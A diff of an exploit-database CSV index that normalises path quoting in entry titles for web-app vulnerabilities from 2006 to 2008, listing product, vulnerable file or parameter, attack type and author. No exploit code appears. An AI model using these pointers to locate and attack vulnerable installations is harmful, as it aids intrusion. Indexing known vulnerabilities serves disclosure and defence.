+17774,7 @@ id,file,description,date,author,platform,type,port 2871,platforms/php/webapps/2871.txt,"LDU 8.x - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps,0 2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps,0 -2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - 'admin/FileServer.php' File Disclosure",2006-12-01,qobaiashi,php,webapps,0 +2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - '/admin/FileServer.php' File Disclosure",2006-12-01,qobaiashi,php,webapps,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - Cross-Site Scripting / Local File Disclosure",2006-12-01,ajann,asp,webapps,0 2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - Full Path Disclosure / File Inclusion",2006-12-02,y3dips,php,webapps,0 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 @@ -17814,7 +17815,7 @@ id,file,description,date,author,platform,type,port 2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks 2.05 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2940,platforms/php/webapps/2940.txt,"mxbb module charts 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 -2943,platforms/php/webapps/2943.txt,"Azucar CMS 1.3 - 'admin/index_sitios.php' File Inclusion",2006-12-18,nuffsaid,php,webapps,0 +2943,platforms/php/webapps/2943.txt,"Azucar CMS 1.3 - '/admin/index_sitios.php' File Inclusion",2006-12-18,nuffsaid,php,webapps,0 2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,php,webapps,0 2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - 'id_user' SQL Injection",2006-12-18,"the master",php,webapps,0 2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0 @@ -17827,7 +17828,7 @@ id,file,description,date,author,platform,type,port 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0 2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusions",2006-12-20,mdx,php,webapps,0 -2965,platforms/php/webapps/2965.txt,"TextSend 1.5 - 'config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,php,webapps,0 +2965,platforms/php/webapps/2965.txt,"TextSend 1.5 - '/config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,php,webapps,0 2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 - Source Code Disclosure",2006-12-20,Kacper,php,webapps,0 2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - 'htm2PHP.php' File Disclosure",2006-12-21,"the master",php,webapps,0 2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 @@ -17837,7 +17838,7 @@ id,file,description,date,author,platform,type,port 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - 'inertianews_main.php' Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion",2006-12-22,mdx,php,webapps,0 -2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - 'admin/auth.php' Remote File Inclusion",2006-12-22,mdx,php,webapps,0 +2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - '/admin/auth.php' Remote File Inclusion",2006-12-22,mdx,php,webapps,0 2981,platforms/php/webapps/2981.php,"open NewsLetter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 2982,platforms/php/webapps/2982.txt,"3editor CMS 0.42 - 'index.php' Local File Inclusion",2006-12-22,3l3ctric-Cracker,php,webapps,0 2983,platforms/php/webapps/2983.txt,"b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion",2006-12-23,mdx,php,webapps,0 @@ -17855,13 +17856,13 @@ id,file,description,date,author,platform,type,port 2996,platforms/asp/webapps/2996.htm,"Enthrallweb eNews 1.0 - Remote User Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 2997,platforms/asp/webapps/2997.pl,"File Upload Manager 1.0.6 - 'detail.asp' SQL Injection",2006-12-24,ajann,asp,webapps,0 2998,platforms/asp/webapps/2998.pl,"NewsLetter MX 1.0.2 - 'ID' SQL Injection",2006-12-24,ajann,asp,webapps,0 -2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - 'chat/login.php' Code Execution",2006-12-24,nuffsaid,php,webapps,0 +2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - '/chat/login.php' Code Execution",2006-12-24,nuffsaid,php,webapps,0 3000,platforms/php/webapps/3000.pl,"Pagetool CMS 1.07 - 'pt_upload.php' Remote File Inclusion",2006-12-24,g00ns,php,webapps,0 3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate 3.4 - (agent) SQL Injection",2006-12-24,ajann,asp,webapps,0 3002,platforms/php/webapps/3002.php,"HLStats 1.34 - 'hlstats.php' SQL Injection",2006-12-25,"Michael Brooks",php,webapps,0 3003,platforms/php/webapps/3003.txt,"Jinzora 2.7 - 'INCLUDE_PATH' Multiple Remote File Inclusions",2006-12-25,nuffsaid,php,webapps,0 -3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - 'mod.php/friend.php/admin.php' Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 -3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - 'admin/admin_settings.php' Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 +3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - '/mod.php/friend.php/admin.php' Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 +3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - '/admin/admin_settings.php' Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - 'phpbb_root_path' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3007,platforms/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusions",2006-12-25,nuffsaid,php,webapps,0 3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps,0 @@ -17875,9 +17876,9 @@ id,file,description,date,author,platform,type,port 3017,platforms/php/webapps/3017.php,"PHP-Update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 -3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - 'admin/uploads.php' Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 +3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - '/admin/uploads.php' Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.phppath' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 -3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - 'bu/process.php' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 +3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - '/bu/process.php' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusions",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 3029,platforms/php/webapps/3029.php,"Cacti 0.8.6i - 'cmd.php popen()' Remote Injection",2006-12-27,rgod,php,webapps,0 @@ -17910,7 +17911,7 @@ id,file,description,date,author,platform,type,port 3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0 3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - 'language.php' Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 -3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - 'inc/init.inc.php' Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 +3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - '/inc/init.inc.php' Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0 3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php?id' SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 @@ -17946,14 +17947,14 @@ id,file,description,date,author,platform,type,port 3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php?id' SQL Injection",2007-01-17,SlimTim10,php,webapps,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)",2007-01-17,"silent vapor",php,webapps,0 3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)",2007-01-17,trew,php,webapps,0 -3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - 'mep/frame.php' Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0 +3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0 3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3)",2007-01-17,666,php,webapps,0 3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0 -3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - 'lang/index.php' Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 +3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - '/lang/index.php' Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - 'grab_globals.lib.php' Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 3153,platforms/php/webapps/3153.php,"phpBP RC3 (2.204) - SQL Injection / Remote Code Execution",2007-01-18,Kacper,php,webapps,0 -3161,platforms/php/webapps/3161.txt,"PHPSherpa - 'include/config.inc.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - 'include/includes.php' Remote File Inclusion",2007-01-20,GoLd_M,php,webapps,0 +3161,platforms/php/webapps/3161.txt,"PHPSherpa - '/include/config.inc.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 +3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - '/include/includes.php' Remote File Inclusion",2007-01-20,GoLd_M,php,webapps,0 3163,platforms/php/webapps/3163.txt,"Neon Labs Website 3.2 - 'nl.php g_strRootDir' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3164,platforms/php/webapps/3164.pl,"PHPIndexPage 1.0.1 - 'config.php' Remote File Inclusion",2007-01-20,DeltahackingTEAM,php,webapps,0 3165,platforms/php/webapps/3165.txt,"MySpeach 2.1b - 'up.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 @@ -17974,11 +17975,11 @@ id,file,description,date,author,platform,type,port 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - 'print.asp' SQL Injection",2007-01-25,ajann,asp,webapps,0 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - SQL Injection / Cross-Site Scripting",2007-01-25,ajann,asp,webapps,0 -3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 - 'vp/configure.php' Remote File Inclusion",2007-01-25,GoLd_M,php,webapps,0 +3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 - '/vp/configure.php' Remote File Inclusion",2007-01-25,GoLd_M,php,webapps,0 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - 'package.php' Remote File Inclusion",2007-01-26,"Cold Zero",php,webapps,0 3202,platforms/php/webapps/3202.txt,"AINS 0.02b - 'ains_main.php ains_path' Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps,0 3203,platforms/php/webapps/3203.txt,"FD Script 1.3.2 - 'download.php' Remote File Disclosure",2007-01-26,ajann,php,webapps,0 -3205,platforms/php/webapps/3205.txt,"nsGalPHP - 'includes/config.inc.php racineTBS' Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 +3205,platforms/php/webapps/3205.txt,"nsGalPHP - '/includes/config.inc.php racineTBS' Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 3206,platforms/php/webapps/3206.txt,"ACGVclick 0.2.0 - 'path' Remote File Inclusion",2007-01-27,ajann,php,webapps,0 3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,php,webapps,0 3208,platforms/php/webapps/3208.txt,"ACGVannu 1.3 - 'index2.php' Remote User Pass Change",2007-01-27,ajann,php,webapps,0 @@ -18047,7 +18048,7 @@ id,file,description,date,author,platform,type,port 3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution",2007-02-13,diwou,php,webapps,0 3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - 'pollmentorres.asp id' SQL Injection",2007-02-13,SaO,asp,webapps,0 3305,platforms/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section",2007-02-13,sn0oPy,php,webapps,0 -3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - 'index.php' Local/Remote File Inclusion",2007-02-14,DarkFig,php,webapps,0 +3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - '/index.php' Local/Remote File Inclusion",2007-02-14,DarkFig,php,webapps,0 3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 - (Client-IP) SQL Injection",2007-02-14,DarkFig,php,webapps,0 3311,platforms/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Arbitrary File Upload",2007-02-14,DarkFig,php,webapps,0 3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - (Post Comments) Remote Command Execution",2007-02-15,str0ke,php,webapps,0 @@ -18215,7 +18216,7 @@ id,file,description,date,author,platform,type,port 3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - 'quotes.php' Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 -3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - 'inc/lang.php' Local File Inclusion",2007-03-29,GoLd_M,php,webapps,0 +3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - '/inc/lang.php' Local File Inclusion",2007-03-29,GoLd_M,php,webapps,0 3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection",2007-03-29,ajann,php,webapps,0 3605,platforms/php/webapps/3605.php,"Picture-Engine 1.2.0 - 'wall.php cat' SQL Injection",2007-03-29,Kacper,php,webapps,0 3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - 'install_root' Multiple Remote File Inclusions",2007-03-29,"ThE dE@Th",php,webapps,0 @@ -18298,7 +18299,7 @@ id,file,description,date,author,platform,type,port 3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0 3722,platforms/php/webapps/3722.txt,"Expow 0.8 - 'autoindex.php cfg_file' Remote File Inclusion",2007-04-12,mdx,php,webapps,0 3723,platforms/php/webapps/3723.txt,"Request It 1.0b - 'index.php id' Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 -3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - 'options.php/save.php' Remote Code Execution",2007-04-12,Gammarays,php,webapps,0 +3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - '/options.php/save.php' Remote Code Execution",2007-04-12,Gammarays,php,webapps,0 3729,platforms/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion",2007-04-13,Omni,php,webapps,0 3731,platforms/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection",2007-04-13,Kacper,php,webapps,0 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0 @@ -18312,7 +18313,7 @@ id,file,description,date,author,platform,type,port 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - 'GALLERY_BASEDIR' Multiple Remote File Inclusions",2007-04-15,GoLd_M,php,webapps,0 3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 -3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - 'scr/soustab.php' Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 +3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - '/scr/soustab.php' Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion",2007-04-16,irvian,php,webapps,0 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps,0 3750,platforms/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,php,webapps,0 @@ -18798,7 +18799,7 @@ id,file,description,date,author,platform,type,port 4565,platforms/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusions",2007-10-23,Civi,php,webapps,0 4568,platforms/php/webapps/4568.txt,"TikiWiki 1.9.8.1 - Local File Inclusion",2007-10-25,L4teral,php,webapps,0 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusions",2007-10-27,GoLd_M,php,webapps,0 -4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 - file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 +4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 - 'file.php' SQL Injection",2007-10-28,ZynbER,php,webapps,0 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - 'action' Remote File Inclusion",2007-10-28,mozi,php,webapps,0 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - 'emc.asp' SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - 'dl.php' Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 @@ -18826,7 +18827,7 @@ id,file,description,date,author,platform,type,port 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps,0 4611,platforms/php/webapps/4611.txt,"jPORTAL 2 - 'mailer.php' SQL Injection",2007-11-06,Kacper,php,webapps,0 4614,platforms/php/webapps/4614.txt,"jPORTAL 2.3.1 - 'articles.php' SQL Injection",2007-11-09,Alexsize,php,webapps,0 -4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script - product_desc.php SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 +4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script - 'product_desc.php' SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 @@ -18853,12 +18854,12 @@ id,file,description,date,author,platform,type,port 4643,platforms/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution",2007-11-22,The:Paradox,php,webapps,0 4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - (nsearch) SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - 'index.php cat' SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 -4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - article.php SQL Injection",2007-11-22,Shadowleet,php,webapps,0 +4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - 'article.php' SQL Injection",2007-11-22,Shadowleet,php,webapps,0 4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem - 'kb_whois.cgi' Command Execution",2007-11-22,"Zero X",cgi,webapps,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - 'show_content.php id' Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 -4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - events.php SQL Injection",2007-11-24,ka0x,php,webapps,0 +4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - 'events.php' SQL Injection",2007-11-24,ka0x,php,webapps,0 4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0 @@ -19033,7 +19034,7 @@ id,file,description,date,author,platform,type,port 4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - 'cat' SQL Injection",2008-01-11,MhZ91,php,webapps,0 4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusions",2008-01-11,k1n9k0ng,php,webapps,0 4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - 'unset()' bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 -4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - 'lib.regset.php/non-blind' SQL Injection",2008-01-11,rgod,php,webapps,0 +4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - '/lib.regset.php/non-blind' SQL Injection",2008-01-11,rgod,php,webapps,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0 4897,platforms/php/webapps/4897.pl,"photokron 1.7 - Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps,0 @@ -19207,7 +19208,7 @@ id,file,description,date,author,platform,type,port 5135,platforms/php/webapps/5135.txt,"WordPress Plugin Photo album - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 -5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 +5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - 'refer.php' SQL Injection",2008-02-18,ka0x,php,webapps,0 5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio Manager 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' SQL Injection",2008-02-18,S@BUN,php,webapps,0 @@ -19334,7 +19335,7 @@ id,file,description,date,author,platform,type,port 5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 - 'mod.php' Local File Inclusion",2008-03-25,girex,php,webapps,0 5317,platforms/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusions",2008-03-26,CraCkEr,php,webapps,0 5318,platforms/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - 'album' SQL Injection",2008-03-28,parad0x,php,webapps,0 -5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - 'user.php' Security Code Bypass / Add Administrator",2008-03-28,NTOS-Team,php,webapps,0 +5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - '/user.php' Security Code Bypass / Add Administrator",2008-03-28,NTOS-Team,php,webapps,0 5322,platforms/php/webapps/5322.txt,"Smoothflash - 'cid' SQL Injection",2008-03-30,S@BUN,php,webapps,0 5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion",2008-03-30,bd0rk,php,webapps,0 5324,platforms/php/webapps/5324.txt,"KISGB (tmp_theme) 5.1.1 - Local File Inclusion",2008-03-30,Cr@zy_King,php,webapps,0 @@ -19927,7 +19928,7 @@ id,file,description,date,author,platform,type,port 6025,platforms/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 -6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - 'pages_data.php' Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 +6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - '/pages_data.php' Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 6034,platforms/php/webapps/6034.txt,"DreamPics Builder - 'page' SQL Injection",2008-07-09,"Hussin X",php,webapps,0 6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",php,webapps,0 6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - 'dirDepth' Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 @@ -20967,7 +20968,7 @@ id,file,description,date,author,platform,type,port 7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,php,webapps,0 7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - Authentication Bypass",2008-12-09,Osirys,php,webapps,0 7398,platforms/asp/webapps/7398.txt,"postecards - SQL Injection / File Disclosure",2008-12-09,AlpHaNiX,asp,webapps,0 -7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local/Remote File Inclusion",2008-12-09,CoBRa_21,php,webapps,0 +7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - '/common-tpl-vars.php' Local/Remote File 